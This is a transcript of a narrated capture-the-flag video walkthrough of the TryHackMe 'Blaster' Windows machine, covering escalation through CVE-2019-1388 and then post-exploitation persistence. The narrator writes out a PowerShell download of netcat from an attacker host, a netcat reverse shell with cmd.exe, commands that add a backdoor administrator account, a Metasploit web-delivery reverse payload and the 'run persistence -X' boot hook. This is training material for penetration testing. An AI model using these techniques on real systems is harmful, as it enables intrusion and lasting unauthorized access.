Welcome again into another cool challenge. The cool challenge today is Blaster. And Blaster is kinda Windows exploitation machine. We will be exploiting Windows. We will using the Windows certificate dialog, which we have covered before. And then we will be touching on the post-exploitation methods. So this is a machine, this is a compilation of the previous machines we have done before. At the same time, we will introduce the post-exploitation on that machine. Now, to deploy the machine, you have to deploy it from here and connect to the network. Then all you have to do is to get started. So this is the Nmap scan. The Nmap scan has revealed we have 2 open ports, one for RDP and one for the web server. Now, if we go to the web server now, let me close this. Okay, so we have, as you can see, Internet Information Service, which means we have to fire directory search. So, directory search. -w. All right, let's see. Okay, so we have one directory revealed, retro. So by looking at the page, you must have remembered that we have covered this before many times. And as you can see by looking at the username Wade and by scrolling down to the post, which is ready one player, you would remember that we have covered this before. Now, as you can see here, this is the password. Now we take this. Of course, previously we have covered how to do that with WordPress. So if you log into WordPress now, from here, login, right? Log into WordPress with Wade and the password we just have found here. You will be logging in. You will be logged in to the administrator panel. From the administrator panel, you can just upload your PHP reversal or whatsoever and have it connect back to your machine, where you will do the privilege escalation. Now, in this video, we will be covering the remote desktop connection. So we will fire Remina. All right. So new connection, RDP. The server is, no, this is the password. Username is Wade. And the server IP. Okay, connect. Name this retro. And what else? All right, let's connect. Yes. So this is where we start our first foothold. And this is the user flag. As you can see, there is a file. Now, if you remember, we have made sense of this file by looking at the browser history. We found that the user has browsed to a CVE number that happens or occurs to be related to this file in the desktop. So if you click on that, for me, they don't appear. I don't know why. At the second attempt, the history doesn't appear for me. I don't know what's the reason for this, but let's look into that. So you click on that. Basically, it's just you have to exploit a vulnerability in Windows Certificate Dialog. Show more details, show information about the publisher's certificates, and click on the VeriSign commercial software publishers. All right, so two here. Right, so what we will do here, we will just right click when the page opens. Now, so Control S, save the page. All right, so here we will click on OK and look for C Windows System 32 cmd.exe. And if you type my, you are the net authority system. So that is the escalation of privileges. Now I know we have covered this before now, but this is not what we have covered before is not enough, right? Maybe the remote desktop connection or the machine, if the machine may restart is scheduled on the machine, or if the machine restarted, you would lose your connection, right? So we would have to complete this and establish a connection back to our machine, meaning that we have to put a backdoor on the machine or put some reverse shell connecting back to us so we maintain the connection. Maybe we have to add a new user on the system. We will explore all of the ways to maintain this connection. Now, let's get back to my machine and see here, new tab. All right, so in the new tab, we will transfer netcut to the desktop and download it from the target machine, or download it to the target machine, upload to the target machine. So cd user share Windows binaries. All right, so let's move nc.exe or copy that to the cp nc to home. So netcut is here. Now launch the Python server. Of course, we have to find my IP. So this is my IP. Fine. Let's get back here and download this from my machine. Now we will use PowerShell to accomplish this. PowerShell -c wget /nc.exe -out file. Maybe we can name it netcut as well. So nc.exe, and here we have to put this into double quotes. Oh, what's happening? Oh, this is not cool. Right. Out file. Oh, come on. I just can't get the space running. I think I will have to do it from scratch. Get HTTP nc.exe dash out file nc.exe. Yep, that's it. So let's see on our console here. Right, it's running. Enter. So the file has been retrieved. Let's make sure the file has been retrieved. dir and netcut is here. Now let's create a listener nc.lpp 4545 and connect. So here nc.exe 4545 and don't forget to add -e to execute the command, which is cmd.exe. And as you can see on the left, on the right, sorry, we have the connection back. Now we have established some kind of persistence, but we need to make that persistence complete by adding a new user to the system, right? So right now we don't need to use the remote desktop here. We already have the connection on our machine and we can just proceed from that point. So dir, all right, let's add a new user. Net user, put here, my name, password, my name / add. Let's add now my user to the administrators group. Net local group administrator. The username is Motasim and add net users. So we have Motasim and we have Motasim, Wade, and administrator. Now let's make sure that my username, right, has been added successfully to the administrators group. Net local group and then administrators. So as you can see, my name has been added successfully to the administrators group. Now, what we will do here, we will just now log in with my username. Let's close this connection. We don't need it anymore. Close that one. All right. So new one, the server name is, where is the IP? Username Motasim and the password is Motasim. Retro connect. So this is my desktop now. Let's see here, Windows Server Manager. The question is, does it contain Active Directory? I don't think so. No, there is no Active Directory here. Okay, now put cmd I'll launch it from here quicker. Oh, what happened? Anyway, the machine is being slow. So if I type here, who am I? So here we are in authority system. Fine. Now here, who am I? Here we are model. Who am I slash prev. Shut down the system, bypass traverse checking, remove computer from locking station, increase the process working set, change time zone. But still the username is administrator, by the way, and we can make sure of that by cd back dr cd administrator access denied. Net local group administrators. Yes, I'm administrator from administrators group, but seems like we can't access the administrator folder. Anyway, so that is the one persistence option. That's the second persistence option. Now, that's for people who are preparing for OSCP, by the way. Now, what if you want to do it in the Metasploit method? Suppose that you're not preparing for OSCP, you don't care about OSCP, you are just an expert and you want to save yourself time, and you encounter the situation where you got remote desktop access to your target machine, but you want to establish a quick foothold, a quick persistence method, without wasting your time on Netcat and the Python server whatsoever. So we can use Metasploit, of course. So MSF console. And we use the web delivery option. Use exploits multi script web show options. Let's see here. So leave these as they are and set your lhost. Now the lhost problem. It's config. Set port. Make sure the port does not conflict with the current port we are using on the right side. So 4546. Now we have to configure the targets. Show targets. Since we're dealing with Windows, we're going to select PSH PowerShell. Set target to. And then we have to set the payload. So how do we deliver the payload and what kind of shell we want to receive? The shell will be interpreter and the payload will be, let's say, set or show payloads. So we have many payloads we can use here. All right, since we're looking for interpreter, let's check this out. Shell TCP UID, reverse TCP, but this is not interpreter, we want interpreter. Interpreter here. So what do we have here? Reverse HTTP. I guess we're gonna have to use these ones. Bind hidden TCP. Bind TCP is an option. Reverse HTTP is an option. Okay, let's use the, where was this? Okay, bind TCP. Or since we're not targeting a NAT network, I don't want to use bind. Let's use reverse HTTP. Use the reverse all the time when you are targeting something in the internal network. Since we are connecting to the TryHackMe internal network, we are in the internal network, so you don't want to use bind. So set payload, and yes, that's it. Let's run. What is this -k? Okay. Now we run this on the target machine. The code base doesn't work. Come on. Okay, I'm gonna use this one. No? And seems like the MSF option will cause us troubles. All right. So run -j. Yep, it's in use, unfortunately. Let's change the local port. Set L port 4547. Okay. So the copy paste doesn't work here. What happened to this? Oh, it's just the connection has been off. All right. Very good. Now we will have to go through the same trouble and get the connection back. All right, let me close this connection here. All right. And so here I will use wait connect. All right, let me connect back to my console, to my machine. Okay. Now let's take this. and run this again on the target machine, but we can't run it here. Let's run it here then. Paste. Run. Okay, it seems like we can't do it from this point. All right, so let's get back here and run it here. See if it would work. Oh no, this is not good. No. Okay, I think it will not work here. So I will just take it again and run it from the same console. Paste. So this is the Metasploit session has been opened. All right. So sessions dash I. We have one sessions. We can interact with the session. As you can see, it is net authority system. Now I have both ways of establishing persistence on that machine, Metasploit way and non-Metasploit way. So there you have it. Oh, before I forgot, so we have to answer the questions. Let's put on complete here and see what we have to do. So how many ports? 2. Looks like there is a web server running. What is the title of the page we discover when browsing to it? I think it's painful to find it now. IIS Windows Server. Interesting. Let's see if there is anything else on this web server by fuzzing it. What hidden directory do we discover? Retro. Navigate to our discovered hidden directory. What potential username do we discover? Wait. Scrolling through the posts, seems like our user has had some difficulties logging in recently. What possible password do we discover? And the password, let's see here. Log into the machine via RDP and read user.txt. What is the contents? So the content of that user is this. Okay. When enumerating a machine, it's often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on the server. What CVE it was? So remember it was CVE 2019 1388. No? I guess it's difficult now to find this because I lost the history of that machine and I need to find it somewhere, some way, another way. Let's see the formula, CVE, what CVE it was. Maybe I have to change the formula of my answer. Maybe CVE dash 2019 dash 1388. Okay, Looks like an executable file is necessary for exploitation of this vulnerability, and the user did not really clean up very well after testing it. What is the name of this executable? Now that we have spawned a terminal, let's go ahead and run the command who am I. What is the output of running this? So it was net authority system, right? That's what I remember. Net. So here we await, right? Let's get back here. Take it from the session we have already established. Huh. Now that we have confirmed that we have an elevated prompt, read the contents of the root.txt and on the administrator's desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task 4. So let's find the content. Since we closed the session, let's use the metasploit one to find the content of the root.txt. Sessions-i1 cat or shell cd users cd administrator cd desktop cat and I type root. Okay. Okay. First, let's set the target to PSH. This is Metasploit. Look, they use the Metasploit method. Let's set the target to PSH. Which target number is PSH? Was 2? Yes. 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 But last but certainly not least, let's look at persistent mechanisms via Metasploit. What command can we run in our interpreter console to set up persistence, which automatically starts when the system boots? Do not include anything beyond the base command and the option for boot startup. So what's the persistent command we will use on Metasploit? Let's see here. So from here, let me exit the channel. Yes. Run persistence-x. So this is the persistence script that would start as the system boots up. So this is the persistent of Metasploit. So here it is run persistence-x. So Blaster, there you have it.